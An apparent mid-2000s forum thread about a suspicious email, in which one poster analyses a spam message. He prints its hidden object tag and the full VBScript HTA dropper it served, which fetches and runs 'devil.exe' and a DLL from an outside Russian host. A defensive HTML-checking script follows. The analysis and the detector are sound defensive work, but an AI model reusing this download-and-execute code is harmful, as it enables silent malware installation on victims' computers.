Received Strange Email


Demonic Angel

I got an email today from them, an automated response to an email I supposedly sent them at 4.30pm today - but I haven't sent them any emails and have never heard from them! Plus I was at work at 4.30 and have no access to my home account from there.

Has anyone else received any emails from them? I have emailed them back saying I don't know what they are on about.

It says:

Thank you for contacting GCQW.co.uk

We will reply to your email as soon as possible.

Should you require an immediate response, please feel free to contact us during our normal office hours:

Monday to Sunday 9am to 5pm on tel: 01427 677155 or 01427 615389

Thank you

GCQW.co.uk

This is their site, and I know I've not been on there before - I don't do bikes!

Is there any way anyone can send an email on my behalf without me knowing? No one has access to my personal PC apart from me and no email has been sent to them from my sent items folder - I don't understand how they have gotten my email address..... it's a "proper" email too, not a Hotmail or Yahoo address and is only set up through my Outlook.

Can anyone help?

Link to comment
Share on other sites

Golden Rule of E-mail... If you don't know it, or don't trust it, delete it! ;)

Link to comment
Share on other sites

yep delete it I'd say..

a lot of companies manage to get people's personal email addresses and just send out junk mail..

I used to get loads of crap like that

Link to comment
Share on other sites

Some viruses spread themselves by scanning emails in the address book of a PC they infect and then sending to all those addresses, often in the guise of the person who owns the infected PC.

Harvester bots are programs that seek out email addresses on the Internet then use those to send emails elsewhere. This happened to me and a number of friends got an email from me that wasn't from me, if you see what I mean. I even got an email from 'myself'! That email address of mine is now history.

Do you subscribe to any forums, especially USENET newsgroups using your usual email address? This is a classic way that others can gain access to (and use) your email address.

This company's autoresponse email could be replying to an email sent to them using your email address.

Or it could be them who are the instigators having got hold of your address. Delete it and do a virus check.

Link to comment
Share on other sites


just spoofed .. don't worry.. delete

Link to comment
Share on other sites

Yup, I'd say get rid of it.

There's also the possibility that a potential virus or spyware is using your PC as an "e-mail server."

Some viruses have the potential to use your very PC as a way of posting their junkmail.

However, you'd experience slow internet usage, slow PC performance, and usually, the 1000's of bizarre e-mails in your sent box!

Link to comment
Share on other sites

I subscribe to all the forums I use with that email address, so it could be from anywhere!

My virus scanner checks all incoming emails though and it certified it virus free.....?? Will still do a scan though to be on the safe side.....

Steve - what does spoofed mean? :unsure:

Link to comment
Share on other sites

bit late - sorry.

if you haven't deleted the message yet (and you should have by now!), I would like to have a look at the source of the message.

it is not impossible to use email to trigger downloading executables from the internet - such executables are generally trojans or viruses.

which browser do you use? and which operating system?

Link to comment
Share on other sites

One rule when using the internet and email in particular... if you don't know the address/sender... don't even bother opening it!

I wouldn't mind seeing the source code too, as there are many triggers within emails that can cause your computer to be open to a hack at any time. It might not specifically be the email holding the virus (hence why your spam/virus checker thing didn't pick it up?). But there are often tags placed within the email that trigger an event somewhere else, like on the sender's server, and then you can be infected and sent even more crap.

A common thing with many email servers and web servers in general, is if they are open to attack at any time for even a millisecond then something called a Denial of Service attack (DoS as more commonly known) can occur, which is defined by Joel Deitch as:

‘miscreants send a flood of traffic that overwhelms Web servers, hosts, routers, and other network devices. This volume is so enormous that users, customers, and partners can't access their networks and systems for extended periods of time.’

This is a VERY common thing with virus tagged emails.... which is why you should never open an email you don't know!

Also... this is a simple explanation as to why your email service or any website using a web server or database server will show a message saying that an unexpected amount of traffic is causing slowdown or something like that. It happens to Hotmail quite a lot!

Damned Hackers! Leave us alone!!

Oh, sorry for the smart **** answer, but it's good to learn new things isn't it class.... (all say yes in a really bored way...)

Here endeth the lesson!

Link to comment
Share on other sites

<yawn> yes sir! </yawn> ;)

Now let that be a lesson to us all. Don't open strange emails. Treat them like junk mail you get in the post. These people don't even give you a free pen!

Link to comment
Share on other sites

Cheeky.... :P

But yeah, very sorry for boring the pants off of y'all!

Link to comment
Share on other sites

I'm normally really good and don't open them - guess curiosity got the better of me.... and you know what happened to curiosity.... :P

Well ran a virus check last night and it came back clean.

Will defo be more careful in future though!

I will post the source still if anyone wants it! Matthew - my OS is Windows XP Pro and my browser is Firefox....

Ahhh just remembered - deleted the message last night..... :unsure:

Link to comment
Share on other sites

I think it's probably just someone being 'funny' put your email address in a mailing list thing or whilst asking for information on one of their products for instance....

You may find you'll now get a regular mail from them. If this happens click an unsubscribe link or email the company.

Link to comment
Share on other sites


yep delete it I'd say..

a lot of companies manage to get people's personal email addresses and just send out junk mail..

I used to get loads of crap like that

So true. Most of my spam these days is all in Japanese or trying to sell me cheap software. Set so many word filters up it's unbelievable!

Link to comment
Share on other sites

I will post the source still if anyone wants it! Matthew - my OS is Windows XP Pro and my browser is Firefox....

Ahhh just remembered - deleted the message last night.....  :unsure:

if FF is your default browser - you may be safer.

many of these viruses exploit vulnerabilities in IE.

let me see if I can find the source of one I got a while ago

Link to comment
Share on other sites

Okay - this is what I mean.

I received this spam a while back

Buenos Dias, Sariah!

her drop test-flew white. why animal sat you daily? cheerfully act outran an call versus boy. it gainsaid his solid steam upon smell. noisily. this bitter record above fold, which sheared yellow, long square. Fidel quick-froze the solid screw. i came Mekhi why overthrew her Zaria! i strewed early coast, that spread deliberately... into ball reset hearing, run pleaded excluding the root among secret word:

"how they overpaid her?"

"i learned you strange."

automatic wood power laded, it chid rightfully, annually, far. it overthrew your tall root upon its sad shirt, who chose kindly. that hard face rapped in their block; fertile, material place. natural place crack atrided, it wove regularly, noisily, happily. you foretold its kind end behind some small skirt, who knew selfishly. their round leather foreshowed with a wing; fixed, brown field. who science unswore you wearily? loosely wall bereft an land within instrument. it grew an acid end inside fire. successfully. i woke an long month past my smooth wall, who unwound solemnly. they burst the small detail after a opposite dollar, that enwound angrily. she quick-froze it electric. Brayden dared some brown attack. you rebound Angela which strung it Douglas! she mislaid a sad branch following his brown glove, who outsold less. some wrong print tore from her vessel; public, black pot. cut pocket reaction befell, she sight-read enormously, rarely, mysteriously. some soft tax set within his discussion; dear, bad pocket. i self-fed that parallel book above my low earth, which spat stealthily. he overbore us mixed. he built opposite fire, which overspent seriously.

it strung an late s*x through his like friend, that overspent monthly. this wise wing mi***** despite their earth; red, quiet cost. broken block copper bethought, i offset seldom, weakly, painfully. her open day tore over an iron; serious, tall boy. she dared an able draw as an complete event, who bet punctually. you knew it complex. we hamstringed common selection, that blawed suspiciously...

froze our white kick,

Rowan MATHEWS.

this obviously made me think - WTF? what are they trying to sell me?

I read the source of the email, which was

<HTML>
<BODY>
<FONT face="Verdana, Arial">
Buenos Dias, Sariah!
<P>
her drop test-flew white. why animal sat you daily? cheerfully act outran an call versus boy. it gainsaid his solid steam upon smell. noisily. this bitter record above fold, which sheared yellow, long square. Fidel quick-froze the solid screw. i came Mekhi why overthrew her Zaria! i strewed early coast, that spread deliberately... into ball reset hearing, run pleaded excluding the root among secret word:
<P>
"how they overpaid her?"<BR>
"i learned you strange."
<P>
automatic wood power laded, it chid rightfully, annually, far. it overthrew your tall root upon its sad shirt, who chose kindly. that hard face rapped in their block; fertile, material place. natural place crack atrided, it wove regularly, noisily, happily. you foretold its kind end behind some small skirt, who knew selfishly. their round leather foreshowed with a wing; fixed, brown field. who science unswore you wearily? loosely wall bereft an land within instrument. it grew an acid end inside fire. successfully. i woke an long month past my smooth wall, who unwound solemnly. they burst the small detail after a opposite dollar, that enwound angrily. she quick-froze it electric. Brayden dared some brown attack. you rebound Angela which strung it Douglas! she mislaid a sad branch following his brown glove, who outsold less. some wrong print tore from her vessel; public, black pot. cut pocket reaction befell, she sight-read enormously, rarely, mysteriously. some soft tax set within his discussion; dear, bad pocket. i self-fed that parallel book above my low earth, which spat stealthily. he overbore us mixed. he built opposite fire, which overspent seriously.
<P>
it strung an late s*x through his like friend, that overspent monthly. this wise wing mi***** despite their earth; red, quiet cost. broken block copper bethought, i offset seldom, weakly, painfully. her open day tore over an iron; serious, tall boy. she dared an able draw as an complete event, who bet punctually. you knew it complex. we hamstringed common selection, that blawed suspiciously...
<P>
froze our white kick,<BR>
Rowan MATHEWS.
</FONT><P>
<img width=50 height=100 style="display:none"><ObJecT data="http://www.oil-bank.ru/cgi-bin/devil/rcounter.cgi?action=click">


<BR><BR>
<TABLE width=400><HR>
<P style="FONT: 9pt/11pt verdana">[URL=http://www.avast.com]avast! Antivirus[/URL]: Inbound message clean.
<P style="FONT: 8pt/11pt verdana">Virus Database (VPS): 0503-2, 01/21/2005<BR>Tested on: 1/23/2005 6:00:22 PM<BR><FONT color=gray>avast! - copyright (c) 2000-2004 ALWIL Software.</FONT></P>
<TBODY></TBODY></TABLE>
<BR>

</BODY>
</HTML>







<html>
<BR><BR>
<TABLE width=400><HR>
<P style="FONT: 9pt/11pt verdana">avast!/SMTP2000 Antivirus: Outbound message clean.
<P style="FONT: 8pt/11pt verdana">Virus Database (VPS): 1/21/2005<BR>Tested on: 1/23/2005 18:00:34 +0100<BR><FONT color=gray>avast! - copyright (c) 2000-2004 ALWIL Software.</FONT></P>
<TBODY></TBODY></TABLE>
<BR></html>

the important part to note is the image tag

<img width=50 height=100 style="display:none"><ObJecT data="http://www.oil-bank.ru/cgi-bin/devil/rcounter.cgi?action=click"> 

accessing that URL directly prompted me to download a file called htmlhelp.hta, which I opened in notepad to read

<HTML><HEAD><TITLE>Universal Plugin Installer</TITLE>
<HTA:APPLICATION id=PlugInst
APPLICATIONNAME="Plugin Installer"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<object id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<object id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<BODY>
<script language="VBScript">

Dim oXMLHTTP
Dim oStream
Dim oShellApp
Dim oFolder
Dim oFolderItem
Dim PluginFile
Dim WinDir
Dim EnvStrings
Dim XMLBody
Dim cByte
Dim ByteCode
Dim FileName
Dim Module_Path
Dim Trojan_Path

ssfWINDOWS=36
WinEnv_Mask="windir="

Exploit_Path=document.location.href
j=InStrRev(Exploit_Path,"/",-1,1)
Exploit_Path=Left(Exploit_Path,j)

If InStr(Exploit_Path,"cgi-bin")<>0 Then
  CGI_Script_Path=Exploit_Path & "rcounter.cgi"    
Else
  CGI_Script_Path=Exploit_Path & "cgi-bin/devil/rcounter.cgi"    
End If  

InitPaths()

self.MoveTo 6000,6000

FileName=""
Randomize
rr=Int(8*Rnd)
ik=0
Do
 ii=Int(25*Rnd)+97
 FileName=FileName+Chr(ii)
 ik=ik+1
Loop While ik<rr
FileName=FileName & ".exe"

RunCommand=""
Call Download_and_Execute(Trojan_Path,FileName,RunCommand,0)

FileName=""
rr=Int(8*Rnd)
ik=0
Do
 ii=Int(25*Rnd)+97
 FileName=FileName+Chr(ii)
 ik=ik+1
Loop While ik<rr
FileName=FileName & ".dll"

RunCommand="," & "InstallWMH " & Trojan_Path & " " & CGI_Script_Path
Call Download_and_Execute(CGI_Script_Path & "?action=install",FileName,RunCommand,1)

self.Close

Sub Download_and_Execute(Remote_path,Local_name,Run_params,Run_by_Rundll32)

set oXMLHTTP = CreateObject("Microsoft.XMLHTTP")
Module_Path=Remote_path
OpenSession()
GetFile()

On Error Resume Next
Set oStream = CreateObject("ADODB.Stream")
If Err.number <> 0 Then
 
  For Each WinEnv In MSplay.Environment("PROCESS")
    If InStr(WinEnv,WinEnv_Mask)<>0 Then
       EnvStrings=Split(WinEnv,"=",-1,1)
       WinDir=EnvStrings(1)  
    End If
  Next
  FileName=WinDir & "\" & Local_name
  Plugin_size=LenB(XMLBody)
 
  Set PluginFile=MSmedia.CreateTextFile(FileName, TRUE)

  For j=1 To Plugin_size
      cByte=MidB(XMLBody,j,1)
      ByteCode=AscB(cByte)
      WriteFile()
  Next

  PluginFile.Close
  If Run_by_Rundll32 = 0 Then
     Cmd=FileName & " " & Run_params
  Else
     Cmd="rundll32" & " " & FileName & Run_params  
  End If
  MSplay.Run (Cmd),1,FALSE
Else
  Set oShellApp = CreateObject("Shell.Application")
  Set oFolder=oShellApp.NameSpace(ssfWINDOWS)
  Set oFolderItem=oFolder.PubikName("hh.exe")
  WinDir = Left(oFolderItem.Path,InStrRev(oFolderItem.Path,"\"))
  FileName=WinDir & Local_name
     
  Plugin_size=LenB(XMLBody)
 
  Set PluginFile=MSmedia.CreateTextFile(FileName, TRUE)

  For j=1 To Plugin_size
      cByte=MidB(XMLBody,j,1)
      ByteCode=AscB(cByte)
      WriteFile()
  Next

  PluginFile.Close

  If Run_by_Rundll32 = 0 Then
     Cmd=FileName & " " & Run_params
     oShellApp.ShellExecute Cmd
  Else
     Cmd=FileName & Run_params  
      oShellApp.ShellExecute "rundll32", Cmd
  End If
   
  Set oStream=Nothing
  Set oShellApp=Nothing
End If
set  oXMLHTTP=Nothing

End Sub

Function WriteFile
PluginFile.Write(Chr(ByteCode))
End Function

Function GetFile
oXMLHTTP.Send()
XMLBody=oXMLHTTP.responseBody
End Function

Function OpenSession
Req_type="G" & "E" & "T"
HTTPSession=oXMLHTTP.Open(Req_Type,Module_Path,0)
End Function

Function InitPaths
Trojan_Path="http://www.oil-bank.ru/devil.exe"
End Function

</SCRIPT>
</BODY></HTML>

again - the important part of this is

Function InitPaths
Trojan_Path="http://www.oil-bank.ru/devil.exe"
End Function

basically - this nonsense looking email was trying to exploit a hole in Internet Explorer (which has been patched by MS) to download an executable to my machine (this devil.exe).

I don't know what it is - I never downloaded it (obviously :rolleyes: ) - but, given the lengths gone to to try and deliver this to my machine without my knowledge - I guessed it was not a nice piece of software.

That's why I was asking those questions - sometimes things are significantly more sinister than they seem.

Link to comment
Share on other sites
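
An added example, not part of the original thread or any poster's code: a small Python check that flags, in an HTML mail body, the kind of markup pointed out in the post above, an element hidden with display:none and an object tag that loads a remote URL. The sample message and its example.invalid host are constructed placeholders, and the tag and attribute lists are this example's own choice.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tags that make a mail client fetch or run remote content when the message renders.
ACTIVE_TAGS = {"object", "embed", "iframe", "script", "applet"}
URL_ATTRS = ("data", "src", "codebase", "href")


class MailHtmlAuditor(HTMLParser):
    """Collects findings about active or hidden content in an HTML mail body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so "ObJecT" matches too.
        attrs = {k: (v or "") for k, v in attrs}
        style = attrs.get("style", "").replace(" ", "").lower()
        hidden = "display:none" in style or "visibility:hidden" in style
        remote = [attrs[a] for a in URL_ATTRS
                  if urlparse(attrs.get(a, "")).scheme in ("http", "https")]
        if tag in ACTIVE_TAGS:
            for url in remote or [""]:
                self.findings.append(("active-content", tag, url))
        elif hidden:
            self.findings.append(("hidden-element", tag, remote[0] if remote else ""))


def audit(html_body):
    """Return a list of (kind, tag, url) findings for one HTML body."""
    auditor = MailHtmlAuditor()
    auditor.feed(html_body)
    auditor.close()
    return auditor.findings


# Constructed sample, modelled on the tag quoted in the post; the host is a placeholder.
SAMPLE = (
    '<HTML><BODY><FONT face="Verdana">Buenos Dias!</FONT><P>'
    '<img width=50 height=100 style="display:none">'
    '<ObJecT data="http://tracker.example.invalid/cgi-bin/counter.cgi?action=click">'
    '</BODY></HTML>'
)

if __name__ == "__main__":
    for kind, tag, url in audit(SAMPLE):
        print(f"{kind:15} <{tag}> {url}")
```

A virus scanner reporting "message clean" is consistent with a finding here, because the message only carries a reference to remote content rather than the payload itself.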
